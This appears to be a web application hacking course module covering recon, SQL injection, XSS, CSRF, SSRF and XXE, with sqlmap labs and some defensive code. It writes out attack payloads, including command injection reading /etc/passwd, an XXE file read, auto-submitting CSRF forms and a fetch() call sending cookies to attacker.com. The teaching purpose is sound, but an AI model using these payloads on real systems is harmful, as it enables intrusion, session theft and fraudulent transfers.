
Web Application Hacking

Introduction to Web App Security

Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.


1. Web App Reconnaissance

Information Gathering

- WHOIS Lookup (Domain details)

- Subdomain Enumeration (Sublist3r, Amass)

- Technology Stack Detection (Wappalyzer, BuiltWith)

- Directory Bruteforcing (Dirb, Gobuster)

- Wayback Machine (Historical snapshots)


Tools

```bash
sublist3r -d example.com
# Technology stack detection is done in the browser at wappalyzer.com (a web service, not a CLI command)
gobuster dir -u https://example.com -w /path/to/wordlist.txt
```


2. Common Web Vulnerabilities

A. Injection Attacks

1. SQL Injection (SQLi)

- Classic SQLi: ' OR 1=1 -- -

- Blind SQLi: Time-based/Boolean-based

Tools: SQLmap, Burp Suite

Example (the query the application ends up running after admin'-- is submitted as the username; everything after -- is a comment, so the password check is discarded):

```sql
SELECT * FROM users WHERE username = 'admin'--' AND password = ''
```


2. Command Injection

- Executing OS commands via input fields:

```bash
; cat /etc/passwd
```


3. Cross-Site Scripting (XSS)

- Stored XSS: <script>alert(1)</script>

- Reflected XSS: https://example.com/search?q=<script>alert(1)</script>

- DOM XSS: Browser-side script execution

B. Broken Authentication

1. Credential Stuffing

- Using breached passwords

Tools: Hydra, Burp Intruder



2. Session Hijacking

- Stealing cookies via XSS/MITM

Tools: Ferret, Hamster

3. Default Credentials

- admin:admin, root:password


C. Sensitive Data Exposure

1. Insecure APIs

- Exposed API keys, tokens

Tools: Postman, Burp Suite

2. Directory Listing

- /backup, /admin accessible


D. Security Misconfigurations

1. Exposed Admin Panels

- /admin, /wp-admin

2. Verbose Error Messages

- Leaking stack traces, DB info


E. Cross-Site Request Forgery (CSRF)

- Forcing users to execute unwanted actions:

```html
<img src="https://bank.com/transfer?amount=1000&to=attacker">
```



F. Server-Side Request Forgery (SSRF)

- Accessing internal services:

```
https://example.com/fetch?url=http://localhost
```
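For the SSRF case above, an added example (not from the original post) of the server-side check a /fetch?url= endpoint needs: it refuses non-HTTP schemes and any target, literal or resolved, that lands in loopback, private or link-local space. The resolver argument is this example's own hook so the check can be exercised offline with a constructed DNS table.

```python
import ipaddress
import socket
from urllib.parse import urlparse


def _is_internal(ip) -> bool:
    # Loopback, RFC 1918/ULA, link-local (cloud metadata lives at 169.254.169.254), etc.
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def default_resolver(host: str) -> list:
    # Real DNS lookup; swapped for a constructed table when testing offline.
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_fetch_url(url: str, resolver=default_resolver) -> bool:
    """Decide whether /fetch?url=... may open this URL from the server side."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False                      # file://, gopher://, dict:// and friends
    host = parsed.hostname
    if not host:
        return False
    try:
        targets = [ipaddress.ip_address(host)]            # literal IP, including [::1]
    except ValueError:
        try:
            targets = [ipaddress.ip_address(a) for a in resolver(host)]
        except (OSError, ValueError, LookupError):
            return False                  # unresolvable or odd answer: fail closed
    if not targets:
        return False
    return not any(_is_internal(ip) for ip in targets)


# Caveat: the address checked here must be the one actually connected to.
# Pin the resolved IP for the outbound request and re-check every redirect
# hop, otherwise DNS rebinding or a 302 to an internal host bypasses the filter.
```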

 

G. XML External Entity (XXE)

- Reading local files via XML:

```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
```

  

3. Exploitation Techniques

Step 1: Automated Scanning

- Burp Suite (Manual testing)

- OWASP ZAP (Automated scanning)

- Nikto (Vulnerability scanner)

Step 2: Manual Testing

- Intercepting requests (Burp Proxy)

- Tampering parameters (Headers, cookies)

- Fuzzing inputs (Wfuzz, FFUF)


Step 3: Post-Exploitation

- Privilege escalation

- Data exfiltration

- Persistence mechanisms


4. Hands-On Labs

Lab 1: SQL Injection with SQLmap

1. Find the vulnerable parameter and enumerate databases:

```bash
sqlmap -u "https://example.com/login?id=1" --dbs
```

2. List the tables in the target database:

```bash
sqlmap -u "https://example.com/login?id=1" -D dbname --tables
```

   

Lab 2: XSS Exploitation

1. Inject payload in search box:

```html
<script>alert(document.cookie)</script>
```

2. Steal cookies:

```javascript
fetch('https://attacker.com/log?cookie=' + document.cookie)
```


Lab 3: CSRF Attack

1. Craft malicious HTML:

```html
<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
</form>
<script>document.forms[0].submit()</script>
```
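Why the Lab 3 form fails against a protected endpoint, as an added example (not from the original post): a simulated /transfer handler that binds a CSRF token to the session and checks the Origin header as a second layer. The session store, secret and request dictionaries are constructed for the demo; bank.com is the page's own example host.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret and session store for the example.
SERVER_SECRET = secrets.token_bytes(32)
SESSIONS = {"sess-123": {"user": "alice"}}


def issue_csrf_token(session_id: str) -> str:
    # Token derived from the session ID, so it is only valid for that session
    # and cannot be guessed by a page on another origin.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(cookies: dict, headers: dict, form: dict) -> tuple:
    """Simulated POST /transfer handler. Returns (status, message)."""
    session_id = cookies.get("session")
    if session_id not in SESSIONS:
        return 401, "not logged in"
    # Defence in depth: a cross-site form post carries the attacker's Origin.
    origin = headers.get("Origin")
    if origin is not None and origin != "https://bank.com":
        return 403, "cross-origin request rejected"
    # Core check: the browser sends the cookie automatically, the token it does not.
    token = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    return 200, f"transferred {form['amount']} to {form['to']}"


def legitimate_request() -> tuple:
    # Form rendered by bank.com itself, so it carries the session's token.
    sid = "sess-123"
    form = {"amount": "10", "to": "bob", "csrf_token": issue_csrf_token(sid)}
    return handle_transfer({"session": sid}, {"Origin": "https://bank.com"}, form)


def forged_request() -> tuple:
    # Lab 3's auto-submitted form: the cookie rides along, the token cannot.
    form = {"amount": "1000", "to": "attacker"}
    return handle_transfer({"session": "sess-123"}, {"Origin": "https://attacker.com"}, form)
```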

   

5. Defensive Measures

Secure Coding Practices

- Input validation

- Prepared statements (SQLi)

- CSP headers (XSS)

- CSRF tokens


Security Tools

- WAFs (ModSecurity, Cloudflare)

- DAST/SAST Scanners (Checkmarx, SonarQube)

- Honeypots (Glastopf)


6. Bug Bounty & Ethical Hacking

Platforms: HackerOne, Bugcrowd

Methodology:

  1. Recon

  2. Vulnerability Scanning

  3. Exploitation

  4. Reporting

Conclusion

- Web app hacking involves recon, exploitation, and post-exploitation.

- OWASP Top 10 is a must-know for pentesters.

- Automated tools + manual testing = Best approach.


🔹 Next Steps:

Module 8: Wireless Network Hacking

- Practice on DVWA, WebGoat.

- Try HTB, TryHackMe web challenges.

- Learn advanced Burp Suite techniques.


Would you like a deep dive into bypassing WAFs? 🚀
